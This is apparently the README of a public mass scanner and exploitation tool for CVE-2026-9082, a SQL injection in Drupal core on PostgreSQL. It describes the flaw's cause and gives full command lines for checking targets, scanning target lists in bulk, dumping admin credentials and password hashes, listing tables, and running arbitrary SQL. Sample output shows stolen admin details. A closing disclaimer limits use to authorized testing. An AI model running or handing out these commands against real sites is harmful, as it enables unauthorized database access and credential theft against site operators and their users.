Unauthenticated SQL Injection in Drupal Core (PostgreSQL)
JSON:API filter array key injection via PDO placeholder name abuse
CVE-2026-9082 is a Highly Critical SQL injection vulnerability in Drupal Core affecting all PostgreSQL-backed sites running Drupal 8.0 through 11.3.9. Added to the CISA Known Exploited Vulnerabilities (KEV) catalog on 2026-05-22 — actively exploited in the wild.
| Severity | CVSS | Auth Required | Attack Vector |
|---|---|---|---|
| Critical | 9.8+ | None | HTTP (JSON:API) |
- Data exfiltration — extract databases, users, password hashes
- Privilege escalation — create admin accounts, modify content
- Remote code execution — in some configurations via
pg_exec()orCOPY ... PROGRAM
| Status | Versions |
|---|---|
| ❌ Vulnerable | Drupal 8.0.0 → 11.3.9 (PostgreSQL backend) |
| ✅ Fixed | 11.3.10, 11.2.12, 10.6.9, 10.5.10 |
The flaw exists in core/modules/pgsql/src/EntityQuery/Condition.php. The translateCondition() method uses user-controlled array keys from JSON:API filter parameters to construct PDO placeholder names. PDO only parses [a-zA-Z0-9_] as placeholder names, so any suffix after ) becomes literal SQL injected into the query.
JSON:API Filter → array key with SQL → PDO placeholder truncation → SQL injection
- ✅ Mass scanner — scan hundreds of targets concurrently
- ✅ Single target mode — check individual Drupal sites
- ✅ Time-based detection —
pg_sleep()blind SQLi confirmation - ✅ Boolean-based detection — row count comparison
- ✅ Version extraction — identify PostgreSQL version
- ✅ Database info — extract current user and database name
- ✅ Admin credential dump — username, email, password hash (uid=1)
- ✅ Table listing — enumerate all public tables
- ✅ Custom SQL queries — run any extraction query
- ✅ Proxy support — route through Burp Suite or similar
- ✅ Output to file — save mass scan results
- ✅ Colored terminal output — easy to read results
- Python 3.8+
pip(Python package manager)
# Clone the repo
git clone https://github.com/ridhinva/CVE-2026-9082.git
cd CVE-2026-9082
# Install requirements
pip install requestsThat's it! Only one dependency — requests.
python3 cve_2026_9082_scanner.py -u https://target.com --checkpython3 cve_2026_9082_scanner.py -f targets.txttargets.txt format:
https://target1.com
target2.com
192.168.1.100
python3 cve_2026_9082_scanner.py -u https://target.com --versionpython3 cve_2026_9082_scanner.py -u https://target.com --dbinfopython3 cve_2026_9082_scanner.py -u https://target.com --adminpython3 cve_2026_9082_scanner.py -u https://target.com --tablespython3 cve_2026_9082_scanner.py -u https://target.com --query "SELECT usename FROM pg_catalog.pg_user"python3 cve_2026_9082_scanner.py -f targets.txt -o results.txtpython3 cve_2026_9082_scanner.py -u https://target.com --check --proxy http://127.0.0.1:8080# Increase sleep time for time-based detection (default: 5s)
python3 cve_2026_9082_scanner.py -u https://target.com --check --delay 10
# Increase HTTP timeout for slow targets (default: 30s)
python3 cve_2026_9082_scanner.py -u https://target.com --check --timeout 60| Flag | Description |
|---|---|
-u, --url |
Single target URL |
-f, --file |
File with targets (one per line) |
-o, --output |
Save scan results to file |
--check |
Check if target is vulnerable |
--version |
Extract PostgreSQL version |
--dbinfo |
Extract DB user and database name |
--admin |
Extract Drupal admin credentials (uid=1) |
--tables |
List all database tables |
--query |
Custom SQL extraction query |
--threads |
Threads for mass scan (default: 20) |
--timeout |
HTTP request timeout (default: 30s) |
--delay |
pg_sleep delay for detection (default: 5s) |
--no-ssl-verify |
Skip TLS certificate verification |
--proxy |
HTTP proxy (e.g., http://127.0.0.1:8080) |
╔══════════════════════════════════════════════════════════════╗
║ CVE-2026-9082 - Drupal PostgreSQL SQLi ║
║ Mass Scanner + Exploitation Tool v1.0.0 ║
╚══════════════════════════════════════════════════════════════╝
CISA KEV: Added 2026-05-22 | Advisory: SA-CORE-2026-004
[*] Checking: https://vulnerable-drupal-site.com
[!!] VULNERABLE - https://vulnerable-drupal-site.com
Method: time-based (+5.2s)
Resource: node/article
[+] username: admin
[+] email: admin@example.com
[+] pass_hash: $S$E8gJ8yJ8...hashed_password...
| Source | Link |
|---|---|
| Drupal Advisory | SA-CORE-2026-004 |
| CISA KEV | CVE-2026-9082 |
| Patch Commit | ea9524d9 |
| NVD Entry | CVE-2026-9082 |
| Discoverer | Michael Maturi |
This tool is for authorized security testing, educational purposes, and ethical research only.
Unauthorized access to computer systems is illegal. The authors assume no liability and are not responsible for any misuse or damage caused by this program.
Ridhin V A (@ridhinva) — Bug bounty hunter & security researcher
Built because CISA KEV said it's being exploited in the wild. Patch your Drupal sites.